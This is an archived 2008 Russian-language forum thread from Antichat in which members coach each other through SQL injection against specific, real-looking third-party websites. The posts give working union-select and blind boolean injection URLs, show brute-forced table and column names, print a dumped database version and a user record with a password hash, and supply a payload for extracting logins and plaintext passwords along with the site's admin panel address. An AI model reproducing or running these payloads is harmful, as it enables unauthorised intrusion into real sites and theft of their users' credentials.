ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.08.2008, 15:22
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от satana8920
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда
Объясняю раз и на всегда: 
В запросе скорее всего 2 селекта
почитай это :
http://forum.antichat.ru/threadnav43966-3-10.html
|
|
|
02.08.2008, 15:30
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
я так понял мне надо подзапросы использовать?если да то как это осуществить?
|
|
|
|
02.08.2008, 16:39
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от satana8920
я так понял мне надо подзапросы использовать?если да то как это осуществить?
Прочитать про посимвольный перебор, а так же про подзапросы (да и про многое другое) можно здесь: https://forum.antichat.ru/threadnav43966-1-10.html
Код:
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=1 - запрос выполняется правильно, результат запроса не меняется
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=2 - запрос выполняется не правильно, результат запроса меняется
Таким образом посимвольно выводи нужную тебе информацию (для начала нужно вывести версию, т.к. подзапросы доступны начиная с версии 4.1), только делать это руками не рационально, лучше скриптом или программой:
Код:
version(): 4.1.11-Debian_4sarge7
user(): db35109_rooted@10.1.3.24
database(): db35109_x1
Т.к. версия БД => 4.1 то использовать подзапросы можно:
Код:
http://www.irintech.com/x1/blogarchive.php?id=764+and+(select+1)=1 - это уже пример подзапроса
Дальше тебе нужно брутить таблицы, могу попробывать если хочешь (т.к. я сейчас занимаюсь тестированием своего скрипта, который как раз работает со слепыми инъекциями), если найдутся какие либо (займет поиск часа 2-3), то добавлю инфу в этот же пост.
А вот и найденые таблицы:
Код:
Имена таблиц взяты из файла: lib_and_data/grey_table_name.txt
Всего: 1559 имён таблиц
Найдено таблиц: 2
admin
user
Колонки к таблице admin:
Код:
Подбор имён колонок к таблице: admin
Найдено колонок: 1
id
Колонки к таблице user:
Код:
Подбор имён колонок к таблице: user
Найдено колонок: 4
id
username
email
password
Жаль что колонки к таблице с админами не сбрутились, надо будет мне состряпать словарь с именами колонок, а то того что юзаю я пока не хватает.
Вывел данные из таблиц, может пригодится:
Код:
Вывод результата запроса: (select id from admin limit 0,1)
length((select id from admin limit 0,1)): 1
(select id from admin limit 0,1): 1
Код:
Вывод результата запроса: (select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1)
length((select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1)): 45
(select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1): 35:jean:jean:3308150413ecf9da841f9a9dd90309ba
Последний раз редактировалось Grey; 03.08.2008 в 16:19..
|
|
|
|
03.08.2008, 12:01
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Сообщение от Fuckel
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд
а хера его обходить. Ведь меняется только текст в урле.
Вот тебе Яркий пример:
https://forum.antichat.ru/showthread.php?t=27498
и
https://forum.antichat.ru/thread27498.html
одно и тоже (обязательно прочти статью по этим линкам)
Единственное, что сложно подбирать правильный урл. Другого способа, отличного от подбора не знаю. Впринципе особо не интересовался. Погугли, может найдёшь что-нить. А если найдёшь, то скинь в личку ссылок =)
|
|
|
|
03.08.2008, 23:56
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
привет. я только учусь =)
нашол SQL на http://www.aquarell-sts.ru/products/index.php?id=50'
подобрал количество: http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+1,2,3/* - вот, вроде, 3 =)
также могу подставить вместо 2 например user(), database(), etc..
НО пробую так:
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+mysql .user/*
в ответ:
SELECT command denied to user 'a2513_aquarell'@'lbarbero-15.m-10.ru' for table 'user'
типа команда SELECT для юзера a2513_aquarell ЗАпрещена =(
что мне делать? =*)
|
|
|
|
04.08.2008, 00:01
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
тебе запрещён селект из таблы юзер .. тк кк версия 4ая - ищи другие таблы ..
|
|
|
|
04.08.2008, 00:08
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
таблици искать перебором?
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+table/*
и table перебереть брутом?
|
|
|
|
04.08.2008, 00:10
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)
|
|
|
|
04.08.2008, 00:21
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от eLWAux
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)
Код:
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,concat(login,0x3a,pwd),333+from+users/*
Пароли в открытом виде, админка:
http://www.aquarell-sts.ru/admin/
|
|
|
|
04.08.2008, 01:06
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
Ded MustD!e:
СПАСИБО!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
а если не секрет мож мне россказать как ти узнал про login и pwd?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
